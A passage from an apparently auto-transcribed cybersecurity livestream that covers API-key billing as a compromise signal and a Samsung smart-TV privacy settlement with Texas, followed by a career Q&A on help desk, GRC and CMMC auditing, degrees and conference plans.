the tenant, okay? So you can use billing to be essentially an indicator of compromise. The second thing I want to tell you about is, oh, this is a reality. And honestly, guys, no, no. BW5542. Yeah, a little late when there's an uptick in billing for sure. But like, I mean, better late than never, right? I mean, I'd rather detect it at some point than just continue racking up these bills. Remember, everybody, you. You can't stop everything. You can't protect everything. Like, you will have residual risk no matter what. There's no super silver bullet, bulletproof vest type thing. We will always have risk, period, full stop. So having detections, whether they're immediately detected or they're detected at the end of the billing cycle is better than nothing. The other thing I want to tell you guys, and this is Going to trigger a bunch of people in chat. So if you feel triggered or hashtag preach, let me know if you have these API keys. If you change the permissions, you could break and production apps. Okay, now here's the reality. You have a choice. If you send out an email to everybody in the company or all the engineers or all the developers and you say, hey guys, hey ladies, who's using Google API keys in their code? Who's using this API key? Right? Maybe you have it redacted some. You are going to get a subset of people who respond you're never going to like. Very likely no one's going to respond. So you could say all day, every day, hey, whose keys are these? Whose keys are these? I'm going to shut these keys off, I'm going to change the permissions on these keys. No one will say anything. And then you shut it down or you change the permissions and it breaks something, they are going to scream at you. Okay, so you have a choice. You could either spend a month trying to find these people or you could just pull the plug on it and see who complains, right? This is a choice that a lot of cyber professionals have had to deal with over the years. A lot of people who, who are more surly and a more, you know, got scars, gray in the hair, they will pull the plug and see who complains. All right, Maybe you send out one email, junior. People who have all like the altruistic ideas of like, oh, we're gonna do it right? They'll send a bunch of emails out and then get no response. All right? Just FYI. And by the way, if that resonates with you, let me know.

B

To stop collecting Texans data. Samsung and the state of Texas have reached a settlement agreement over the alleged unlawful collection of content viewing information through its smart TVs. The company will now have to revise its privacy disclosures to clearly explain its data collection and processing practices to customers. This is all based on a lawsuit filed by Texas Attorney General Ken Paxton last December in which several TV manufacturers were charged with, quote, using automated content recognition technology to collect and process viewing data without first obtaining express informed consent from consumers, end quote. The allegations were that Samsung was using the technology to capture screenshots of consumers TVs to determine what they were watching in order to deliver targeted advertising. The court found that there was, quote, good cause to believe, end quote, that Samsung automatically enrolled customers in this system using dark patterns that included over 200 clicks spread across four or more menus. For a consumer to Read the privacy statements and disclosures, end quote.

A

All right, hey, you know, Texas, shout out to you. Like, you guys might not know it, but Texas is pretty forward on privacy. Like we usually look at more kind of democratic, strong states like Maine or. Well, is Maine really Democratic? Like California for sure, as like leading the charge on privacy. But Texas don't sleep on Texas, man. They are strong with this. So the issue here is that Samsung as a TV producer was very nefarious. I've said this a million times, dude. Data is super valuable. Look at the wealthiest people in the world. The wealthiest companies in the world, they broker in data. Either your data for how to market to you or like Google's entire business model is on, you know, scanning the Internet, having all the data to tell you what to do. It's big money. Okay, so Samsung, pretty, pretty serious charges here. They were basically taking screenshots of your TV and then sending it back to analyze what you're watching so they can market to you. Texas, they're going to have to revise their privacy policy. Either one, they're going to change the policy and allow people to continue to click through and then they'll just have permission to collect your data. I seriously doubt they're going to change it. So they're not collecting data in Texas. That would be a pain point, right? Because if I move to Texas, is the tv. No. I don't know. This could be a landmark case because trust me, lg, Sony, Samsung, I'm sure they're all doing this because it's freaking big money. These dark patterns that they mentioned, by the way, this, a dark pattern is something that is known in marketing. There are dark arts. There are ways to, like, kind of dupe people into doing things that you want them to do. In this instance, Samsung made the privacy policy, I guess, in order to read it, take 200 clicks. My man, if I'm, if I'm doing something on a TV, like 200 clicks is breaking my back. And guys, everybody that has been presented with a size 4 font EULA when installing any software clicks right through it. Right? So a little dubious Samsung, you know, you've been served. Also really quick, they reached a settlement. I'm sure no citizen, no individual who's running a Samsung TV that was impacted by this is going to see any money. Lawyers made a bunch of money, though.

B

The CISO series is going bi coastal this month.

A

Nope. All right, hey, let's holler. We had 400 people in chat. Really quickly. If you're here, stay tuned because we're going to be melting your face. What? How do you melt faces? Oh, don't worry. We got you covered for days. I'm Jerry from Simply Cyber. That was your Simply Cyber Daily Cyber Threat Brief podcast. Shout out to all the first timers, long timers, shout out to the mods. If you got value from the show, let us know in chat. We'll be back tomorrow at 8:00am Eastern Time to do it again. But know this, we're about to run another show called Jawjacking. You don't have to go anywhere. I take care of all of it. I cannot mentor one on one. People want me to mentor one on one. I do not have time for that. But what I can do is give you half an hour and I will answer all the questions that appear in chat to the best of my ability. If I cannot answer the question, I will get somebody who can answer that question. Let's mentor at scale. I'm Jerry from Simply Cyber. Until next time, stay secure. Ever wonder what it takes to break into cyber security? Join us every weekday for Jawjacking, where industry experts answer your burning questions about the cyber security field live, unfiltered and totally free. Let's level up together. It's time for some Jawjacking. Yo, what's up, everybody? Welcome to the party. My name is Jerry Guy. I do Jawjacking as the host. Coming hot off the heels from the Daily Cyber Threat Brief, hosted by that nerd, Dr. Gerald Ozier. Hold on, I gotta get. I gotta get more comfortable here. I do declare, there were infographs. You guys can't really tell, but my studio is an absolute hot trash garbage dumpster fire back here with all the gear I'm trying to get prepped for Zero Trust World. Are we doing bingo on Friday? Unlikely. Roswell uk, I'm going to be live from the Zero Trust World conference floor. Already going to be complicated. I will say Wednesday, Thursday and Friday shows of the Daily Cyber Threat Brief will be special only because, you know, we'll have multiple hosts because, you know, I'm bringing my big mixing board with four inputs and stuff like that, so. Good question. Thank you very much. All right, if you got questions, put them in chat with a queue really quickly. I do want to point out again the that LinkedIn quad code video I released is blowing up. I am so excited because it helps people. It's not just like, oh, I made a video, go check it out. Like, literally, it can help you. Which is the thing Razo UK says, why the pick on the monitor back there? I Wish it wasn't there because I have deleted that graphic file from my computer. And yet somehow it's retained. So I have released. Excuse me, that is a display of a Mac Mini. My Mac Mini has been hardened, wiped and hardened. And I run Open Claw on it. My AI bot is called Karn. K A R N Karn. Karn was the servant of a planeswalker in the Magic the Gathering universe called Urza. This is where Urza lives. So essentially this is like where Karn lives. So it was a picture of like his house and stuff. I, I would prefer it be the Simply Cyber logo, but I literally cannot change the background. And I've had people tell me how to do it. I've done it. It doesn't work. So that's why this is that it, it all ties into the identity of the Open Claw AI bot that I've built. Shall we play a game? Random skill says, do you use blue light filtering? Either glasses or set your monitors to filter all blue light? Which is the best? Or has it worked best for you? So interestingly, these glasses are blue flight blue light blocking. I do wear prescription glasses now to read, but these are not prescription. Dude, you know, I don't know what's up with these blue light things. I, I don't wear these except for messing around as Jerry guy on Jawjacking. I haven't noticed any material improvements of wearing blue light blocking versus not so to me. I don't know. Maybe I'm just old and grizzled and like, But I don't know. I haven't, I haven't noticed any benefit from blue light blocking. Can you make a Grc Mafia shirt? Soul Shine? Sure. Soul Shine. Here you go. Done again. I'm terrible at like marketing, so, like, I don't tell people about the merch. I don't tell people about projects I'm working on. I forget to tell people about Simply Cyber Academy. This is my online school with all the courses to help you crush life. Like, I forget to tell people all the stuff all the time. I'm not great at business. I, I, I'm, I'm passionate about helping people and in cyber security. All right, here we go. Cyber Shimgami says ran those prompts from the video in chat. GPT Notebook. Gemini Claude thoughts on Career Span app. It was blowing my mind. Cool, dude. Thank you, Cyber Shin Andami. So Cyber Shin Andami did my video. Hold on one second. So again, if you haven't seen this yet, I released a video yesterday at 4:00pm that is taking The Internet by storm. Okay. I show you how to use Claude code and LinkedIn data to absolutely discover unbelievable hidden value in LinkedIn. Okay. So sick. Look at this. Look at this. I have told you guys before, personal branding. Personal branding adds value. You want to guess when I started doing personal branding? This is my LinkedIn profile. You'll notice this ridiculous hockey stick. That's me starting simply Cyber. All right, come on. Bruising hacks is excited. Nice. All right, continuing to look. Yes, Bruising hacks. I have tried turning it off and on again. Oh, Michael Fink with a deep cut. Urza's glasses. I actually used to run that when I was 14. All right. Real Bilbo is going to be there, I think, at Zero Trust World. Try Trini Heffy. Are we able to receive CPAs for watching on replay? Yeah, I don't see why not. I mean, if you watch. Here's my thing. The Daily Cyber Threat Brief is essentially an instructor led webinar. So if you watch it on replay as an instructor led webinar, why wouldn't it be valuable? Yep. Yep. Sean Washington, who's also in my one an upcoming YouTube video, which is pretty cool. Thank you, Jenny. Jawjacking question from Oscar. Is it smart to get into entry level? I t helped us to have a real shot at getting into cyber. Nowadays you can get into cyber without going through help desk. You can get into cyber by going through help desk. Having IT help desk experience certainly can help you. So I. I mean, is it smarter? I mean, that question has a lot of dependencies, right? I mean, what have you done before? Like, I was a software engineer, so I wasn't, you know, I didn't do help desk. I was developing software and then I got into cyber out of pure spite. If you. If you don't know the story, I was very spiteful because my code got audited by security and failed. And I was pissed. So I was going to prove them wrong. In reality, I found my. My passion for cyber. I don't know. I guess for this question, is it smarter to get an entry level IT help desk? I would say this. If you have an IT help desk job opportunity, take it. IT will. And then start migrating towards, like, either going higher up in IT or transitioning over to cyber. Let's see. All right, so Michael Fink has some source material, I mean, some statistical information around using blue light blocking and having benefits from it. So there you go. A lot of talk around the blue light blocking. Sasha M. Is it reasonable to have to pay for an internship or mentoring. No, absolutely not. That's absurd. The. To me, that is predatory. You should be paid for working an internship. That is predatory. All day, every day. That's vile, dude. Now I will say paying for mentoring, okay? If, if it's like a formal coach or you know, work like, like, if it's a formal coaching thing where it's very clear that this is time for money etc, then I can say that paying for that kind of mentoring is fine. You can get mentoring for free. You can get mentoring paid. Paying for an internship is absurd. Being able to pay so you can work on for someone, that. That makes me mad, man. So with the AI being so hot, is GRC the new in? I don't understand the question, but we will say GRC is hot. Little doubled shock here. All right, Jerry. Going viral. Thank you legrat. A lot of people commenting on blue lights and help desk stuff. Are many home office GRC work available? Sure, yeah, yeah. Home office or travel. Right? I mean Eduardo, when I was a GRC auditor, I would travel quite a bit to go to remote locations to audit them for, you know, whatever I was auditing them for. So, you know, you didn't have to go to a home office because you were traveling. Hey Jerry, how's that vulnerability management class coming? I talked about this last week. I have all the lectures recorded. I need to record the labs, which is difficult for me to find the time to do so. It's in progress still. Justin says I have four years of help desk and a dozen certs not even getting rejection letters. All right, so Justin, maybe take a look at your resume, see it, maybe get that adjusted a little bit. Maybe spec. Have your resume adjusted for the specific job or. Hey, even. Sorry, one second. Justin, check out this video here. I just. This is the video that I was talking about earlier that I just released. You might be able to use this video to kind of help mine some value out of your LinkedIn connections and network that can help you. Let's see. Continuing to look through chat right now. This is simply Cyber's jawjacking. So if you have a question, just put it in chat with a queue up up front and I will answer it. Looks like we are caught up right now. So any questions that come in the queue, I'm happy to answer. If you did ask a question and I didn't see it, write it again in chat with a queue up front and I will answer it. We're going to go to 9:30, so 15 more minutes with the GRC Master Class. Pair with a SEC plus portfolio and a cyber degree. Yeah. Oh, dude. Yeah. I mean that's like a freaking full boat right there. Also want to say really quickly, I got a really nice letter from a woman. Again, listen, really quickly, I cannot promise you a job, okay? Like, that's not how it works. I can't promise you a job. But what I can tell you is my GRC Analyst master class is definitely designed to be practical and get you the skills you need for a job. And several people in simply Cybers community have gotten jobs after taking the Analyst master class. But there's a whole bunch of like prior experience and other things I just want to say quick shout out and I'm going to play a wrecking ball for this one. This woman, Rachel Holmes right here, she emailed me and told me that the GRC Analyst master class was the pivotal thing that changed for her to allow her to get a job as a GRC person. She was in it for 10 years and now she's pivoting. So way to go, Rachel. All right, continuing to look through chat here. Thank you, Jenny. Do you think there's a possibility for the junior and entry level positions in cyber disappear because of AI and MSSP will require less people? No, I don't. So I mean, obviously every industry is going to be disrupted by AI, but one of the cool things about cyber is that your threat actors are typically doing things and using tools in a way that they're not designed, which requires humans to detect that anomalous behavior and be able to kind of identify false positives from true positives. So you're definitely going to need humans in the loop on that one. As far as entry level positions, I'd like to think that instead of being like Soc Analyst Tier 1, it's SOC Analyst Tier 1.5. This is a, this is a perspective from a woman at Cisco named Kirsty Payne, who I'm a big fan of. And essentially it's like AI enabled entry level analysts to be able to move faster, do better. So I think that's what's up. Where's the best place to start to crack into auditing? Are there particular industries? Okay, so hey, healthcare for sure, but goats since Yost, go look up cmmc. Charlie, Michael. Michael, Charlie, cmmc. Because a lot of businesses that do business with the US Federal government are going to have to be CMMC compliant. Getting into the CMMC ecosystem as an authorized auditor is total trash. Like it. It is a good old boy pay. You got a pay to play system. But. But you can get work as a readiness assessor. And the big fir, the big firms, Booz Allen, Deloitte, Accenture, Capgemini, even the smaller ones that are more focused on cyber work, like coal fire risk,360, things like that, they are going to be doing CMMC readiness assessments, which is basically audits for businesses before they go pay to get audited for CMMC compliance. This is where I would look. Get familiar with NIST Special Publication 800 171, get familiar with CMMC and what it requires and go find those jobs. I'm telling you, there's going to be a huge cottage industry around cmmc. Audit experience. Mike. Mickey. Mickey says I'm about to finish my bachelor's in cyber. I'm looking at a master's in cyber. Should I wait a few years and get experience? I'm transitioning from the Air Force. Yeah, I mean, honestly, Mickey, if it were me, okay, and this is not for everybody, okay, because your life has to support it. But like, if it were me, I would work full time and get the masters at the same time. Because I mean, think like, listen, again, I am not. Everybody's got their own journey, everybody's got their own thing. I got two masters and a PhD all while working full time. And during my second masters, we had it. We had our first child and during my PhD we had our second child. So I'm telling you right now, it is completely feasible to do these in parallel while working full time. That's what I would recommend. I. You know, honestly, Mickey, professional experience or not honestly, but like in being fully transparent, professional experience, practical, hands on experience, weighs very heavily. If you have a bachelor's and a master's in cyber and no experience, when you go to apply for a job, it's like, that's great, but. Right. So I'm thinking if I look at someone who's got no experience, but they got a bachelor's and a master's and someone who's got a bachelor's and then two years of professional experience, I might, I might lean on that bachelor's two years of experience candidate if the experience is directly related to the work that I need hired for. So there you go. All right. Continuing to look through chat. Thank you for dropping these in mod chat. It's easier for me to find any new hype for SC Con in November. Alternately, since it's the con of the week, anything you're excited for at0Trust World 26. So Justin Gold is helping with Simply Cybercon. Get it stood up. The CFPs the registration. Kimberly's on the, the website. So we, the big update is there's going to be a big, a big amount of information coming out in the next couple weeks, Ryan. Secondly, zero trust world. I'm hyped, honestly, to see all the folks and I'm trying to put together. I'm having dinner with James McQuiggin tomorrow night, which I'm super excited about and honestly, I'm looking forward to a little bit of a potentially informal, simply cyber community meetup Thursday night. So stay tuned for that. That's what I'm excited about. Obviously, you know, the conference is fun and learning a bunch of new stuff is fun, but hanging out with the community is always, you know, the best part. Real Billow says please post behind the scenes of AV setup at the con. Love seeing those. Yep, yeah, I will. I mean, honestly guys, yesterday I spent a bulk of my time just getting the audio pieces right because I need four microphones, four mic flags, four XLR cables, four headphones, one mixing board, all the, you know, all the wiring, the power supplies, all that stuff. And that was just the audio I haven't even done. I'm doing video today in software today, which is like. Do you think cover letters actually make a difference? No. Can you paste the URL for the SCCON 2025 Mercury? Yeah. Is Kimberly in chat? I don't see Kimberly in chat. Mods, can you help me? The merch for SC 2025 was on Cyber Security central. Kimberly did it through her, her, her, her, her site there. So if, if you can, um, if you can pull that up, please, Mods, we'll get it for you. All right, continuing to look really quickly. Did you forget to turn on the stream to LinkedIn today? No, I don't know. Did I? Says I'm streaming to LinkedIn right now. Oh, I don't know. Come on. It's weird. I'm looking right now. Roswell uk. Unfortunately, Restream failed. I guess that's wild. If we're. If, if, if I'm on LinkedIn right now and it's not live. Yeah, I guess it didn't. I don't know what to tell you. I mean, it says that it's enabled and everything, so I don't know what's up. Let's see. Continue to look through chat. I see Kyle, Kyle has a question. I'm just looking for it so I can bring it up on stream wearing two hats. Since we lost our physical security and access control person, any advice on dual wielding cyber and physical Security? Not really. I mean, physical does fall under the purview of cyber when you're doing audits and stuff like that. I mean, I mean, I guess you could. It's possible since you have the physical security realm now. You could feed in, swipe access logs into your sim, be able to look for weird stuff. Okay, no problem. All right, one second. Yeah, I mean, that's it. Obviously, you know, get, get to be friends with your data center people. Right? If you have a data center. Kyle, Kyle, be friends with them because you know, who, who's accessing the data center is super important. How often do they have physical security controls in place? Like just go look at the PE control family in NIST 853 and that'll give you a pretty solid starting point. Cyber Security Central. Kimberly can fix it. Non profit. Hold on, I'm trying to find. All right, hold on. Where's the merch? Oh my God. All right, hold on. Cyber Security Central Merch store. I mean, it shouldn't be hard this hard to find these things. Yeah, there is a. There is a way to get it, but Kimberly has it. I can't. I can't find it right now. See, it's 9:26. Continuing to look through chat. Was there an attendance certificate for SCCON last year? Yes, Michael. Kimberly sent an email out to everybody with a link. You would go in and download it. So connect with at. Kimberly can fix it on the Discord server. She should have a link for you. Actually, that's a good point. Spam musubi. Spam musubi. Go on the Discord server. If you go to Simply Cyber IO Discord and then ping at. Simply ping at. Kimberly can fix it. She's got the link for the merch. Yeah, I don't know why it's not on LinkedIn today, which is wild because we had 400 people, which we haven't had in a minute. Yeah, I mean, Roswell, uk. The thing is, once I go live, I can't like go live on LinkedIn. Like it's supposed to be like, literally if you look at. I mean, check this out. I know it's going to do like an infinity thing. But look at on LinkedIn right now. Do you see up here on the top? You see on the top right here where it says LinkedIn and YouTube? This is telling me that we are live on YouTube and LinkedIn right now. But when you do this, you see how it says streaming on YouTube but not on LinkedIn. However it is enabled. You see this toggle on so it's a restream issue. I don't, I don't know what it is, but I can't fix it, so. Sorry. All right, continuing to look at chat here. How's the thumb? Oh, yeah, thumb's pretty good. I. I can actually show it on stream now because it's not disgusting. So it's almost back to normal. The nail still looks all janky. So thank you for space tacos, for following that. Took about a month to heal. Let's see, 928. Any questions, I'm here for you, Roswell. I remember when the CC used to call her department Two hats, which I thought was reference to our ability to do multiple roles. Turned out they just didn't like us. All right. Oh, there you go, Kyle. Kyle found the 20 controls in the PE family. Yeah, don't sleep on this documentation. It is some good stuff, man. All right, So the question is, where is it? I don't see where that question is in chat, but like, basically, did I watch a YouTube video about how Israel became a cyber power and how USA pays for their learning? I don't know what YouTube video you're referring to, but Israel is. Israel is a super cyber power. You know, here's the thing. A lot of cyber security product comes out of Israel. It just, they don't, they don't come out and be like, oh, it's Israel. Like Palo Alto is Israeli based, right? I mean, XM Cyber, like there's a ton. Israel's got like, dude, here's the crazy. Not crazy, but here's an interesting thing. Like when a security product comes out, if it's Israeli based, it automatically gets treated like, okay, like this is super legit because they have a track record of making them incredible software. Like, you know, say what you want. I, I don't like that it's been weaponized. But Pegasus Spyware is Israeli based technology for the new video. Aren't you concerned about uploading your entire data archive to Claude? No, I'm not. I mean, first of all, it's like locally on my system, so it is, it is taking some information and pushing it up to Claude. But it's my LinkedIn data. I don't care. Link. LinkedIn already has my data. Microsoft owns LinkedIn. I'm sure Microsoft took all that data and shoved it into Copilot. So, like, no, I, I'm not super concerned about it. Good question though. Kathy Chambers is in the house. Okay. Soul Shine, I don't think you can. Oh, I don't think you can drop links in YouTube chat because we're. It's a control we have in place to prevent people from putting malicious links in the. In the chat. All right, guys, it is time. It's 9:30. Thus completes jawjacking, your Simply Cyber bonus content. We'll be back tomorrow at 8:00am Eastern Time to do it all again live from Simply Cyber, Buffer Osier Flow Studios. But for now, we're gonna put a pin in it. Go check out that YouTube video. I'm super proud of it. I think it's very helpful. If you think it's helpful, share it with your. Your network. Share with your friends. I'm telling you, there's mad value in this video, 100%. And I. I actually show you step by step how to walk through and run it. Like, how to build it, how to run it, all those things. Okay. It does take 24 hours to get the LinkedIn data archive. So go. Go request it today. All right, I'm Jerry from Simply Cyber. Peace out, Boy Scout. Until next time, stay secure.